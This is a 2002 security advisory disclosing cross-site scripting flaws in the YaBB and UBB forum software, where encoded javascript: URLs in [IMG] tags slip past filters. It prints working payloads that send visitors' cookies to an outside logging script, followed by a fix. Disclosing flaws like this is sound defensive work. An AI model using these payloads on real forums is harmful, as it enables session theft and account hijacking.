Advisory
Title: CSS vulnerabilities in YaBB and UBB allow
account hijack [Multiple Vendor]
Release Date: 08/01/2002
Application: YaBB and UBB
Platform: Any system supporting PERL.
Build -
YaBB : 1 Gold - Service Pack 1 - older versions
were effected in the same way.
UBB : Ultimate Bulletin BoardTM 6.2.0 Beta Release
1.0
Severity: Malicious users can steal session cookies,
allowing administrative access to the bulletin
board.
Author:
Obscure^
[ obscure@eyeonsecurity.org
]
Vendor Status:
YaBB - Informed on 01 Jan 2002, should fix some
time in the future ...
UBB - Informed on 08 Jan 2002, should issue a
fix on 09 Jan 2002 (seems like they knew about
the issue).
Web:
http://yabb.xnull.com
http://www.infopop.com/products/ubb/
https://www.eyeonsecurity.org/advisories/
Background.
(extracted from
http://yabb.xnull.com)
YaBB is a leading provider of
FREE, downloadable Perl forums for webmasters,
with currently over 50,000 web communities using
YaBB worldwide, and over 1
million registered users througout these forums!
Join the messaging revolution;
keep visitors coming back....
(extracted from
http://www.infopop.com/products/ubb/)
The Ultimate Bulletin Board (UBB) is the
most widely adopted Perl message board on
the Web. With a solid five year development history,
and worldwide familiarity, it is easy to
use and maintain.
Problem.
When a user inserts [IMG]url[/IMG],
YaBB changes that text to <img src='url'>.
If someone inserts javascript:alert() instead
of the url, the javascript code is executed by
Internet Explorer or some other web browsers.
This allows stealing of cookie data and other
interesting things. YaBB has filtered the javascript
method, however it does not take into consideration
that javascript: can be encoded using standard
HTML hex and ASCII encoding. Same with UBB.
In UBB I need to encode several strings because
they added checking for certain keywords such
as cookie.
In my example I change javascript: to javascript:
Exploit Example.
Inserting a new topic (or reply)
with the following text will send visitor's cookies
to Eye on Security. The output is saved to https://www.eyeonsecurity.org/tools/cookies.txt
. Cookies will
contain the password in the case of UBB and a
session cookie (or encoded password) in YaBB.
-- snap YaBB --
[img]javascript:document.write
('<img src=http://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(document.cookie)+'>')
[/img].
-- snap YaBB --
-- snap UBB --
[IMG]javascript:document.write
('<img%20src=http://eyeonsecurity.net/tools/cookie.plx?
cookie='+escape(document.cookie)+'>')
[/IMG]
-- snap UBB --
Fix.
IMG tags should start with http,
so that Javascript: and other goodies (play with
mailto:)
are not allowed.
YaBB: [link]
My fix for YaBB: [link]
Note.
Other Bulletin Board Systems may
also be vulnerable to these attacks.
Disclaimer.
The information within this document
may change without notice. Use of
this information constitutes acceptance for use
in an AS IS
condition. There are NO warranties with regard
to this information.
In no event shall the author be liable for any
consequences whatsoever
arising out of or in connection with the use or
spread of this
information. Any use of this information lays
within the user's
responsibility.
Feedback.
Please send suggestions, updates,
and comments to:
Eye on Security
mail : obscure@eyeonsecurity.org
web : http://www.eyeonsecurity.org
|